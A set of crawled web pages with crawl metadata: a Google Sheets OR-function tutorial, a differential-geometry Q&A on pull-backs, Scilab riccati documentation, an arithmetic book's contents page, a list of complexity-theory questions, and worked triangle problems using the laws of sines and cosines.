msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:dc01c244-46bd-4118-91e2-9d2550f117bb>\",\"WARC-Concurrent-To\":\"<urn:uuid:6ca801f6-a856-485d-86f6-cb5fe3c893b0>\",\"WARC-IP-Address\":\"104.28.25.168\",\"WARC-Target-URI\":\"http://desistreem.info/third-grade-measurement-worksheets/mass-worksheets-4th-grade-measurement-third-first-and-printables/\",\"WARC-Payload-Digest\":\"sha1:TFGCK5NRQOS67NFWIVVLKK2SBT7TJ5TE\",\"WARC-Block-Digest\":\"sha1:OSK2LCB7DENSYS2G7DOSFJZDV2NU5BC4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986677230.18_warc_CC-MAIN-20191017222820-20191018010320-00121.warc.gz\"}"}
https://solvergeek.com/or-function-in-excel/
[ "July 31, 2021\n\n# OR function in Google Sheet\n\nIn this lesson we will learn how the OR function works in Google Sheet. The OR function is used when you want to check multiple conditions. It returns TRUE if any one of the conditions evaluate to TRUE, else it returns FALSE (Note: it returns FALSE even if one condition is FALSE).\n\n`=OR(logical1, [logical2],…)`\n• logical1 – This is the first condition, you want to evaluate for TRUE or FALSE.\n• [logical2] – Second and rest conditions are optional, that you want to evaluate for TRUE or FALSE.\n\nLet’s understand with a simple example. In below table Price has been mentioned as 5 in cell A2 and 55 in cell A3. We have used OR function in cell B2 with 2 conditions as follows.\n\n`=OR(A2>10,A3<30)`\n• The first condition returns FALSE as A2=5 and 5 is not greater than 10.\n• The second condition also returns FALSE as A3=55 and 55 is not less than 30.\n\nHence the result of OR function is FALSE.", null, "In below example Price has been mentioned as 35 in cell A2. We have used OR function in cell B2 with 2 conditions as follows.\n\n`=OR(A2>10,A2<30)`\n• The first condition returns TRUE as 35 is greater than 10.\n• The second condition returns FALSE as 35 is not less than 30.\n\nHence the result of OR function is TRUE.", null, "#### Notes :\n\n• OR function can be used with other formulas like, in an IF Function, we can test a condition and then specify a value when it’s TRUE and a value when it is FALSE. Using OR function within IF enables users to check multiple conditions at one go.\n• For example, if you have to test whether A1 is greater than 20 or A2 is less than 200, here is how you can do it in an IF function:\n=IF(OR(A1>20,A2<200),”Approve”,”Reject”)\n• The arguments must either evaluate to logical values (TRUE/FALSE), or must be arrays/references of logical values.\n• Maximum of 255 conditions can be tested in a single OR function.\n• If the specified range contains no logical value, the OR function returns #VALUE! error.\n• Text & empty cells are ignored.\n\nYou can check here to know how the OR function works in Excel.\n\nYou can check here to understand how the AND function works in Excel.\n\nYou can check here to understand how the AND function works in Google Sheet.\n\nYou can check here to understand how the NOT function works in Google Sheet.\n\nYou can check here to understand how the NOT function works in Excel.", null, "#### abhraisraja\n\nView all posts by abhraisraja →" ]
[ null, "https://cdn.shortpixel.ai/client/q_glossy,ret_img,w_277,h_114/http://solvergeek.com/wp-content/uploads/2020/03/OR-function-in-Google-Sheet-1.png", null, "https://cdn.shortpixel.ai/client/q_glossy,ret_img,w_278,h_107/http://solvergeek.com/wp-content/uploads/2020/03/OR-function-in-Google-Sheet-2.png", null, "https://secure.gravatar.com/avatar/e912ab4f48cc631ddccdd35a3fc99b5e", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85960394,"math_prob":0.94941646,"size":2423,"snap":"2021-31-2021-39","text_gpt3_token_len":594,"char_repetition_ratio":0.15832989,"word_repetition_ratio":0.35555556,"special_character_ratio":0.26042098,"punctuation_ratio":0.09803922,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9934924,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,1,null,1,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-31T09:18:19Z\",\"WARC-Record-ID\":\"<urn:uuid:d0c334b4-b37b-4432-a6db-a79268fd9bcb>\",\"Content-Length\":\"22589\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1e9f59fa-8222-463b-a8d5-105a183c2f62>\",\"WARC-Concurrent-To\":\"<urn:uuid:a2b9572f-2429-4d6d-8e27-a893e5b9633a>\",\"WARC-IP-Address\":\"141.136.41.144\",\"WARC-Target-URI\":\"https://solvergeek.com/or-function-in-excel/\",\"WARC-Payload-Digest\":\"sha1:LRPPZA74RVOJPR7PTOXXTU3L2UHSB22X\",\"WARC-Block-Digest\":\"sha1:DAK5CWOOFCLD2V5SSYLTLVER3N2OZEZV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154085.58_warc_CC-MAIN-20210731074335-20210731104335-00496.warc.gz\"}"}
https://math.stackexchange.com/questions/3118306/action-of-a-1-form-on-the-push-forward-and-pull-back-of-a-vector
[ "Action of a 1-form on the push-forward and pull-back of a vector\n\nI am studying differential geometry I am trying to proof the expression below.\n\nGiven that for a map $$\\phi$$ : $$M$$ $$\\to$$ $$M$$ the pull-back $$\\phi$$*$$\\omega$$ $$\\in$$ $$T^\\ast_p M$$ of a 1-form $$\\omega$$ $$\\in$$ $$T^\\ast_p M$$ is defined by :\n\n($$\\phi$$*$$\\omega$$)$$(v)$$ = $$\\omega$$($$\\phi_{*}v$$) where $$v$$ $$\\in$$ $$T_{p}M$$.\n\nHow would we proof this in a coordinate basis $$dx^{\\mu}_{p}$$, $$\\phi^{*}\\omega$$ has components:\n\n$$(\\phi^{*}\\omega)_{\\nu} = \\frac{\\partial x^{'\\mu}}{\\partial x^{v}}\\omega_{\\mu}$$\n\nwhere $$\\mathbf{\\omega} = \\omega_{\\mu}dx^{\\mu}_{\\phi(p)}$$ and $$x^{'\\mu} = x^{\\mu} \\bullet \\phi$$.\n\nand also prove that if $$\\phi$$ is a diffeomorphism, then the push-forward is $$\\phi$$*$$\\omega$$ $$\\in$$ $$T^{\\ast}_{\\phi(p)} M$$ of a 1-form $$\\omega$$ $$\\in$$ $$T^{\\ast}_{p} M$$ is defined by:\n\n$$(\\phi_{*}\\omega)(v) = \\omega(\\phi^{*}v)$$ for any $$v \\in T^{\\ast}_{\\phi(p)} M$$. Prove that in the coordinate basis $$dx^{\\mu}_{\\phi(p)}, \\phi_{*}\\omega$$ has components :\n\n$$(\\phi_{*}\\omega)_{\\nu} = \\frac{\\partial x^{\\mu}}{\\partial x^{'v}}\\omega_{\\mu}$$.\n\nTo clarify things please find the extract of the notes I am reading:[extract]\n\nmigrated from physics.stackexchange.comFeb 19 at 0:35\n\nThis question came from our site for active researchers, academics and students of physics.\n\n• Might Mathematics be better suited for this math question? – Kyle Kanos Feb 18 at 12:10\n• please do not cross-post questions, it is considered an abuse of the SE sites and is looked down upon. Just choose one site and if it doesn't get an answer after ~1 week, try at a different site. – Kyle Kanos Feb 18 at 12:44\n• Math mods: Please merge. – Qmechanic Feb 19 at 0:35\n\nI'm not sure what you mean by \"proof\" of a definition. Note that you can't really \"push forward\" a form. You can only push forward a vector at point $$p$$. Your book's \"push forward\" $$\\phi_*$$ of a form is really the pull-back of the form along the inverse map $$\\phi^{-1}$$.\n\nIf $$\\phi: M\\to N$$ takes $$x\\mapsto z(x)$$ then, by definition, the pushforward in coordinate language of\n$$X= \\left.X^\\mu \\frac{\\partial}{\\partial x^\\mu}\\right\\vert_p \\in TM_p$$ is $$\\phi_* X= \\left.X^\\mu \\frac{\\partial z^\\nu}{\\partial x^\\mu} \\frac{\\partial}{\\partial z^\\nu}\\right\\vert_{\\phi(p)} \\in TN_{\\phi(p)}$$ Take care that you can't push forward a vector field unless $$\\phi_* X$$ is 1-1.This is why the book says \"diffeomorphism\" rather than a general map. You can, however, always pull back a form even when $$\\phi$$ is not 1-1.\n\nIf, for example, $$\\eta=\\eta_\\mu(z) dz^\\mu \\in \\Lambda^1 (T^*N)$$ and the map $$\\phi: M\\to N$$ takes $$x\\mapsto z(x)$$ then $$\\phi^* \\eta= \\eta_\\mu(z(x)) d(z^\\mu(x))= \\eta_\\mu(z(x)) \\frac{\\partial z^\\mu}{\\partial x^\\nu}dx^\\nu\\in \\Lambda^1 (T^* M)$$\n\nThere is no real \"proof\" here, just the use of the chain-rule $$dz^\\mu = \\frac{\\partial z^\\mu}{\\partial x^\\nu}dx^\\nu$$ to transcribe into a specific coordinate system the statement of the definition. You can, however, use the explicit formula for the push-forward of a vector to check that this recipe is consistent with the coordinate free langauge\n\nI think, conventionally the pull-back is defined as adjoint to push-forward. So if you have a manifold $$\\bar{\\mathcal{M}}$$, and manifold $$\\mathcal{M}$$ (possibly the same manifold). 
You then need a map $$\\Phi:\\bar{\\mathcal{M}}\\to\\mathcal{M}$$, such that $$x^{\\left(i\\right)}=\\Phi^{\\left(i\\right)}\\left(\\bar{x}\\right)$$.\n\nBased on this you can define a push-foward $$\\phi: T_\\bar{p} \\bar{\\mathcal{M}}\\to T_{\\Phi\\left(\\bar{p}\\right)}\\mathcal{M}$$, such that\n\n$$\\phi\\left(\\bar{A}^i \\bar{\\partial}_i\\right)=\\bar{A}^i \\frac{\\partial \\Phi^{(k)}}{\\partial \\bar{x}^{(i)}} \\partial_k$$\n\nNow you can also define forms on both manifolds, i.e. $$\\omega \\in T_p \\mathcal{M}^*$$, $$\\omega: T_p \\mathcal{M}\\to\\mathbb{R}$$, and same for $$\\bar{\\omega} \\in T_p \\bar{\\mathcal{M}}^*$$. It is convenient to use the following notation for the action of the form $$\\omega$$ one the vector $$A$$:\n\n$$\\langle \\omega | A\\rangle = \\omega\\left(A\\right)=\\omega_i A^i$$\n\nYou can then ask what is the result of applying the form to the push-forwarded vector:\n\n$$\\langle \\omega | \\phi \\bar{A}\\rangle = \\omega_k \\frac{\\partial \\Phi^{(k)}}{\\partial \\bar{x}^{(i)}}\\bar{A}^i$$\n\nFinally you can define the adjoint to the push-forward, the pull-back, as:\n\n$$\\langle \\omega | \\phi \\bar{A}\\rangle = \\langle \\phi^* \\omega | \\bar{A}\\rangle = \\omega_k \\frac{\\partial \\Phi^{(k)}}{\\partial \\bar{x}^{(i)}}\\bar{A}^i$$\n\nWhere the induced pull-back is $$\\phi^*: T_{\\Phi\\left(\\bar{p}\\right)}\\mathcal{M}^* \\to T_{\\bar{p}}\\mathcal{\\bar{M}}^*$$, and $$\\phi^*\\left(\\omega_i dx^i\\right)=\\omega_i \\frac{\\partial\\Phi^{(i)}}{\\partial\\bar{x}^{(k)}} d\\bar{x}^k$$\n\nOften there is abuse of notation, where one says $$x^{(i)}=x^{(i)}\\left(\\bar{x}\\right)$$ (dropping $$\\Phi$$)" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6785792,"math_prob":1.0000025,"size":1082,"snap":"2019-43-2019-47","text_gpt3_token_len":406,"char_repetition_ratio":0.14100185,"word_repetition_ratio":0.0,"special_character_ratio":0.4168207,"punctuation_ratio":0.065727696,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000091,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-19T07:17:58Z\",\"WARC-Record-ID\":\"<urn:uuid:88835b44-2bc7-4aa2-a022-236ecf0c746b>\",\"Content-Length\":\"149627\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3492da79-6b6b-44f8-a672-8d1e4d638c5b>\",\"WARC-Concurrent-To\":\"<urn:uuid:9b9b7354-1628-4193-8fc9-89a5a725b720>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://math.stackexchange.com/questions/3118306/action-of-a-1-form-on-the-push-forward-and-pull-back-of-a-vector\",\"WARC-Payload-Digest\":\"sha1:M4THVYWLZICH2EPDJ42O3236GB2BPNOB\",\"WARC-Block-Digest\":\"sha1:GOZIDMFJE2DK6GE3N2CJKDUDNT7PCJWW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986692126.27_warc_CC-MAIN-20191019063516-20191019091016-00354.warc.gz\"}"}
https://help.scilab.org/docs/6.0.1/en_US/riccati.html
[ "Scilab Home page | Wiki | Bug tracker | Forge | Mailing list archives | ATOMS | File exchange\nChange language to: Français - Português - 日本語 - Русский\n\nSee the recommended documentation of this function\n\n# riccati\n\nRiccati equation\n\n### Syntax\n\n```X=riccati(A,B,C,dom,[typ])\n[X1,X2]=riccati(A,B,C,dom,[typ])```\n\n### Arguments\n\nA,B,C\n\nreal matrices nxn, `B` and `C` symmetric.\n\ndom\n\n`'c'` or `'d'` for the time domain (continuous or discrete)\n\ntyp\n\nstring : `'eigen'` for block diagonalization or `schur'` for Schur method.\n\nX1,X2,X\n\nsquare real matrices (X2 invertible), X symmetric\n\n### Description\n\n`X=riccati(A,B,C,dom,[typ])` solves the Riccati equation:\n\n`A'*X+X*A-X*B*X+C=0`\n\nin continuous time case, or:\n\n`A'*X*A-(A'*X*B1/(B2+B1'*X*B1))*(B1'*X*A)+C-X`\n\nwith `B=B1/B2*B1'` in the discrete time case. If called with two output arguments, `riccati` returns `X1,X2` such that `X=X1/X2`.\n\n### Examples\n\n```// Continuous\nn = 10;\nA = rand(n,n);\nB = rand(n,n);\nC = rand(n,n);\nC = C*C';\nR = rand(n,n);\nR = R*R'+eye();\nB = B*inv(R)*B';\n\nX = riccati(A,B,C,'c','eigen')```\n```// Discrete\n\nn = 10;\nF = rand(n,n);\nG1 = rand(n,n);\nG2 = rand(n,n);\nG2 = G2*G2'+eye();\nG = G1/G2*G1';\nH = rand(n,n);\nH = H*H';\n\n[X1,X2]= riccati(F,G,H,'d','schur')```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5232772,"math_prob":0.9974532,"size":1001,"snap":"2020-45-2020-50","text_gpt3_token_len":353,"char_repetition_ratio":0.118355066,"word_repetition_ratio":0.0,"special_character_ratio":0.32567433,"punctuation_ratio":0.20784314,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9995715,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-05T12:41:22Z\",\"WARC-Record-ID\":\"<urn:uuid:42dff9a4-24dc-46b5-ad39-128bea3b0a39>\",\"Content-Length\":\"31899\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e15bed9c-e10c-4b06-97cd-882adeacff68>\",\"WARC-Concurrent-To\":\"<urn:uuid:07553727-7928-4b1c-86fa-cf0657616402>\",\"WARC-IP-Address\":\"176.9.3.186\",\"WARC-Target-URI\":\"https://help.scilab.org/docs/6.0.1/en_US/riccati.html\",\"WARC-Payload-Digest\":\"sha1:UVH4MP43TNLDEYGG6QMYCYWKVCGIY33V\",\"WARC-Block-Digest\":\"sha1:WOUAEKG64ESNQSWYXOWUP237UZHD3VQP\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141747774.97_warc_CC-MAIN-20201205104937-20201205134937-00485.warc.gz\"}"}
https://books.google.gr/books?id=dgMAAAAAYAAJ&hl=el&lr=
[ "### тИ КщМЕ ОИ ВЯчСТЕР -сЩМТАНГ ЙЯИТИЙчР\n\nдЕМ ЕМТОПъСАЛЕ ЙЯИТИЙщР СТИР СУМчХЕИР ТОПОХЕСъЕР.\n\n### пЕЯИЕВЭЛЕМА\n\n PART I 7 Factors and Divisors 37 Fractions 44 Problems for Analysis 84 Decimal Fractions 90 Practical Measurements 123 Percentage 141 Interest 151\n Banks and Banking 303 Square Root 361 307 Stocks and Bonds 324 Ratio and Proportion Metric System 338 Problems for Oral and written 345 Similar Surfaces 376 Ratio and Proportion 337 Metric System 382 Simple Proportion 338 406 Problems for Oral and written 421\n\n Denominate Numbers 175 Review Problems 188 Percentage 236 work 300 36 301\n Powers and Roots 358 Reference Tables 433 Longitude and Time 319 Compound Proportio 438 78 439 Bills and Accounts 166 Receipted Bills 446 пМЕУЛАТИЙэ ДИЙАИЧЛАТА\n\n### дГЛОЖИКч АПОСПэСЛАТА\n\nсЕКъДА 128 - CUBIC MEASURE 1728 cubic inches (cu. in.) = 1 cubic foot (cu. ft.) 27 cubic feet = 1 cubic yard (cu. yd.) 128 cubic feet = 1 cord (cd...\nсЕКъДА 203 - A Circle is a plane figure bounded by a curved line every point of which is equally distant from a point within called the center.\nсЕКъДА 122 - Square Measure 144 square inches (sq. in.) = 1 square foot (sq. ft.) 9 square feet = 1 square yard (sq.\nсЕКъДА 417 - Troy Weight 24 grains = 1 pennyweight. 20 pennyweights = 1 ounce. 12 ounces = 1 pound.\nсЕКъДА 3 - Arithmetic is the science of numbers, and the art of computing by them.\nсЕКъДА 418 - United States Money 10 mills = 1 cent 10 cents = 1 dime 10 dimes = 1 dollar 10 dollars = 1 eagle The unit of English money is the pound.\nсЕКъДА 20 - Multiplication is the process of taking one number as many times as there are units in another number.\nсЕКъДА 15 - Subtraction Subtraction is the process of finding the difference between two numbers, or of finding what number must be added to a given number to equal a given sum.\nсЕКъДА 125 - The Altitude of a triangle is the perpendicular distance from the angle opposite the base to the base, or to the base produced or extended.\nсЕКъДА 353 - A sphere is a solid bounded by a curved surface, every point of which is equally distant from a point within called the center." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7253687,"math_prob":0.9853471,"size":2381,"snap":"2020-24-2020-29","text_gpt3_token_len":750,"char_repetition_ratio":0.105174586,"word_repetition_ratio":0.048661802,"special_character_ratio":0.24569508,"punctuation_ratio":0.071599044,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9903199,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-12T12:49:43Z\",\"WARC-Record-ID\":\"<urn:uuid:d6932095-1c8c-421d-8e67-484415e5a56d>\",\"Content-Length\":\"69673\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:222a1c87-cb41-4193-9022-2c599fa122ba>\",\"WARC-Concurrent-To\":\"<urn:uuid:dbe38010-1e2a-4c5c-b251-e152723f8ebc>\",\"WARC-IP-Address\":\"172.217.7.238\",\"WARC-Target-URI\":\"https://books.google.gr/books?id=dgMAAAAAYAAJ&hl=el&lr=\",\"WARC-Payload-Digest\":\"sha1:L6WEXMOZJ5RNIF4FFX3APIR6FEJEJLGY\",\"WARC-Block-Digest\":\"sha1:3TA6GQKJJFUHIYOYZGCPLXXZLXISCHM3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593657138718.61_warc_CC-MAIN-20200712113546-20200712143546-00389.warc.gz\"}"}
https://cstheory.stackexchange.com/questions/tagged/cc.complexity-theory?sort=newest&page=50
[ "Questions tagged [cc.complexity-theory]\n\nP versus NP and other resource-bounded computation.\n\n2,620 questions\nFilter by\nSorted by\nTagged with\n239 views\n\nIs there a natural restriction of VO logic which captures P or NP?\n\nThe paper Lauri Hella and José María Turull-Torres, Computing queries with higher-order logics, TCS 355 197–214, 2006. doi: 10.1016/j.tcs.2006.01.009 proposes logic VO, variable-order logic. This ...\n727 views\n\nCommunication complexity for deciding associativity\n\nLet $S=${$0,...,n-1$} and $\\circ : S \\times S \\rightarrow S$. I want to compute the communication complexity of deciding whether $\\circ$ is associative. The model is the following. $\\circ$ is given ...\n2k views\n\nEasy decision problem, hard search problem\n\nDeciding whether a Nash equilibrium exists is easy (it always does); however, actually finding one is believed to be difficult (it is PPAD-Complete). What are some other examples of problems where ...\n718 views\n\nIs $AC^0$ with bounded fanout weaker than $AC^0$?\n\nIn the survey \"Small Depth Quantum Circuits\" by D. Bera, F. Green and S. Homer (p. 36 of ACM SIGACT News, June 2007 vol. 38, no. 2), I read the following sentence: The classical version of $QAC^0$ (...\n834 views\n\nWhat are the current best known upper and lower bounds on the (un)satisfiability threshold for random k-sat and/or 3-sat?\n\nI would like to know the current state of the phase transition for random k-sat, given n variables and m clauses, what is the best known c=m/n for upper and lower bounds.\n2k views\n\nComplexity of exponential function\n\nWe know that the exponential function $\\exp(x,y) = x^y$ over natural numbers is not computable in polynomial time, because the size of the output is not polynomially bounded in the size of the inputs. ...\n382 views\n\nCobham's Result on Efficient Computations\n\nIn the following paper: Alan Cobham (1965), \"The intrinsic computational difficulty of functions\", Proc. Logic, Methodology, and Philosophy of Science II, North Holland. Cobham defined the class P ...\n1k views\n\nSeparating Logspace from Polynomial time\n\nIt is clear that any problem that is decidable in deterministic logspace ($L$) runs in at most polynomial time ($P$). There is a wealth of complexity classes between $L$ and $P$. Examples include $NL$,...\n2k views\n\nAlternative proofs of Schwartz–Zippel lemma\n\nI'm only aware of two proofs of Schwartz–Zippel lemma. The first (more common) proof is described in the wikipedia entry. The second proof was discovered by Dana Moshkovitz. Are there any other ...\n1k views\n\nReferences on Circuit Lower Bounds\n\nPreamble Interactive proof systems and Arthur-Merlin protocols were introduced by Goldwasser, Micali and Rackoff and Babai back in 1985. At first, it was thought that the former is more powerful than ...\n424 views\n\nSimple question about decision problems\n\n(I am in the middle of my first theoretical cs course, so I apologize in advance for what is probably a stupid question.) 
So, we say that some language L is in P, which means that a Turing machine ...\n395 views\n\nIs there any sparse language known to be in NPI under the $P \\neq NP$ assumption ?\n\nI wonder to know wether there are sparse language (even constructed by delayed diagolanization) in NPI under the assumption that $P \\neq NP$.\n2k views\n\nIs Gap-3SAT NP-complete even for 3CNF formulas where no pair of variables appears in significantly more clauses than the average?\n\nIn this question, a 3CNF formula means a CNF formula where each clause involves exactly three distinct variables. For a constant 0<s<1, Gap-3SATs is the following promise problem: Gap-3SATs ...\n326 views\n\nSeparation of limited nondeterminism classes?\n\nIt is interesting to find the best lower bound on the number of nondeterministic bits needed to solve satisfiability problem. Let $\\beta_k P$ be the class of problems solvable by a nondeterministic ...\n984 views\n\nWhat is the best way to get a close-to-fair coin toss from identical biased coins?\n\n(Von Neumann gave an algorithm that simulates a fair coin given access to identical biased coins. The algorithm potentially requires an infinite number of coins (although in expectation, finitely many ...\n373 views\n\nRelativization with Respect to Non-Recursive Oracles\n\nIn the paper Relativizations of the P = ? NP Question, Baker et al. showed that there are relativized worlds in which either P = NP or P ≠ NP holds. All oracles in their settings were recursive sets. ...\n280 views\n\nComplexity of advice language?\n\nLet $L$ be a language in P/poly. There is then a deterministic polynomial-time Turing machine $M$ with polynomial-sized advice that decides $L$. Consider the language $A(M)$ of all advice strings ...\n281 views\n\nIs there known any complexity class containing online counterparts of optimization problems?\n\nIs there known any complexity class containing online counterparts of optimization problems? If not, then how such class can be defined? We know that many problems have their online version: e.g. ...\n1k views\n\n340 views\n\nComplexity of finding vectors with optimal projection?\n\nInput: a set $T$ of vectors $v_i=(x_i,y_i,z_i)$. Where $x_i,y_i,z_i$ are integers. Output: a subset of vectors $v_1,v_2,...,v_n$ with vector addition $m=\\sum v_i$ such that the projection of $m$ on ...\n1k views\n\nWhat is known about the complexity of finding minimum circuits for SAT?\n\nWhat is known about the complexity of finding minimal circuits that compute SAT up to length $n$? More formally: what is the complexity of a function which, given $1^{n}$ as input outputs a minimal ...\n783 views\n\nComplexity Classes for Cases Other Than “Worst Case”\n\nDo we have complexity classes with respect to, say, average-case complexity? For instance, is there a (named) complexity class for problems which take expected polynomial time to decide? Another ...\n914 views\n\nBarriers and Monotone Circuit Complexity\n\nNatural proofs is a barrier towards proving lower bounds on the circuit complexity of boolean functions. 
They do not directly imply any such barrier in proving lower bounds on the $monotone$ circuit ...\n412 views\n\nExhausting Simulator of Zero-Knowledge Protocols in the Random Oracle Model\n\nIn a paper titled \"On Deniability in the Common Reference String and Random Oracle Model,\" Rafael Pass writes: We note that when proving security according to the standard zero-knowledge definition ...\n452 views\n\nUnderstanding QMA\n\nThis question comes out of an answer Joe Fitzsimons gave to a different question. Most natural complexity classes have a one-line \"intuitive description\" that helps characterize core problems in that ...\n657 views\n\nHardness of parameterized CLIQUE?\n\nLet $0\\le p\\le 1$ and consider the decision problem CLIQUE$_p$ Input: integer $s$, graph $G$ with $t$ vertices and $\\lceil p\\binom{t}{2} \\rceil$ edges Question: does $G$ contain a clique on at ...\n487 views\n\nAlgorithms and computational complexity of clique and biclique covers\n\nI've been reading a paper by a mathematical chemist. He proposes some indices to measure the complexity of molecules. From here on in, instead of molecules, think undirected connected graphs: a ...\n3k views\n\nIntractability of NP-complete problems as a principle of physics?\n\nI'm always intrigued by the lack of numerical evidence from experimental mathematics for or against the P vs NP question. While the Riemann Hypothesis has some supporting evidence from numerical ...\n495 views\n\nIs embedding a solution feasible for SAT?\n\nI am interested in \"hard\" individual instances of NP-complete problems. Ryan Williams discussed the SAT0 problem at Richard Lipton's blog. SAT0 asks whether a SAT instance has the specific solution ...\n505 views\n\nDo the proofs that permanent is not in uniform $\\mathsf{TC^0}$ relativize?\n\nThis is a follow up to this question, and is related to this question of Shiva Kinali. It seems that the proofs in these papers (Allender, Caussinus-McKenzie-Therien-Vollmer, Koiran-Perifel) use ...\n2k views\n\nProofs, Barriers and P vs NP\n\nIt is well known that any proof resolving the P vs NP question must overcome relativization, natural proofs and algebrization barriers. The following diagram partitions the \"proof space\" into ...\n304 views\n\nAre there any classes of functions which require provably different resources to compute versus computing their inverse?\n\nApologies in advance if this question is too simple. Basically, what I want to know is if there are any functions $f(x)$ with the following properties: Take $f_n(x)$ to be $f(x)$ when the domain and ...\n416 views\n\nResults showing existence/non-existence of finite graphs with specific computable properties imply certain complexity results\n\nAre there any known results showing that existence (or non-existence) of finite graphs with specific computable properties imply certain complexity results (such as P = NP)? Here's one completely ...\nTree width measures how close a graph is to a tree. It is NP-hard to compute tree width. The best known approximation algorithm achieves $O(\\sqrt{{\\log}n})$ factor. Courcelle's theorem states that ...\nIs there any relationship between the number of vertex covers of a graph $G$ and the permanent of $G$'s adjacency matrix?" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89520127,"math_prob":0.95167124,"size":14034,"snap":"2019-43-2019-47","text_gpt3_token_len":3458,"char_repetition_ratio":0.14226657,"word_repetition_ratio":0.023266219,"special_character_ratio":0.24269632,"punctuation_ratio":0.12914157,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99737245,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-15T06:24:06Z\",\"WARC-Record-ID\":\"<urn:uuid:4989203d-254b-4fbe-a1d9-e6a77ecad06f>\",\"Content-Length\":\"260643\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:62b7cb6f-a277-4398-b06f-4494d7f1a629>\",\"WARC-Concurrent-To\":\"<urn:uuid:74519777-fa3b-429d-8abe-40820e754634>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://cstheory.stackexchange.com/questions/tagged/cc.complexity-theory?sort=newest&page=50\",\"WARC-Payload-Digest\":\"sha1:KEN4MR45NY2Y3SWWZC5KWAFWGJBGC44M\",\"WARC-Block-Digest\":\"sha1:V4AJUR2EMHNVZSNRISZBZQZXRR5MXH5B\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986657586.16_warc_CC-MAIN-20191015055525-20191015083025-00294.warc.gz\"}"}
http://www.icoachmath.com/topics/Geometry/Law-of-Sines-and-Cosines-to-Solve-Triangles.html
[ "#### Solved Examples and Worksheet for Law of Sines and Cosines to Solve Triangles\n\nQ1In triangle ABC, if a = 4, b = 3, and c = 5, then find the measure of the angle opposite to the longest side to the nearest degree.\n\nA. 0o\nB. 45o\nC. 90o\nD. 60o\n\nStep: 1\nThe length c is longer side and the angle opposite to it is angle C.\nStep: 2\nCos C = 42+32-522(4)(3)\n[Use law of cosines:\nCos C = a2+b2-c22ab.]\nStep: 3\nCos C = 024 = 0\nStep: 4\nC = 90o\nQ2In triangle DEF, if d = 6, e = 15, and f = 22, then find the measure of angle D to the nearest degree.\nA. 70o\nB. 60o\nC. 80o\nD. not possible to find\n\nStep: 1\nd2 = e2 + f2 - 2ef cos D.\n[Law of Cosines.]\nStep: 2\nCos D = e2+f2-d22ef.\nStep: 3\nCos D = 152+222-622(15)(22)\nStep: 4\nCos D 1.019696\nStep: 5\nD is not possible. Since the cosine of an angle cannot be greater than one.\nStep: 6\nTriangle cannot be drawn with the given sides.\nCorrect Answer is :   not possible to find\nQ3In ΔDEF, if d = 19, e = 19 and f = 20, then find F to the nearest degree.", null, "A. 26o\nB. 66o\nC. 68o\nD. 64o\n\nStep: 1\nCos F = 192+192 -2022(19)(19)\n[Use law of cosines:\nCos F = d2+e2-f22de.]\nStep: 2\nCos F 0.446\nStep: 3\nF 64°\nQ4In ΔPQR, if Q = 75o, p = 12, q = 17, then find the measure of the angle R to the nearest degree.", null, "A. 75o\nB. 137o\nC. 43o\nD. 62o\n\nStep: 1\nSin 75o17 = Sin P12\n[Use law of Sines: Sin Qq = Sin Pp .]\nStep: 2\nSin P = 12 Sin 75o17\nStep: 3\nSin P = 0.68\nStep: 4\nP = 43o (or) 137o\nStep: 5\nThe measure of 137o is not possible, since 137o + 75o = 212o and 212o is greater than 180o.\nStep: 6\nSo, P = 43o.\nStep: 7\nR = 180 - (75o + 43o)\n[Sum of the angle measures in a triangle is 180o.]\nStep: 8\nR = 62o\nQ5A point A is c cm from B and b cm from C as shown in 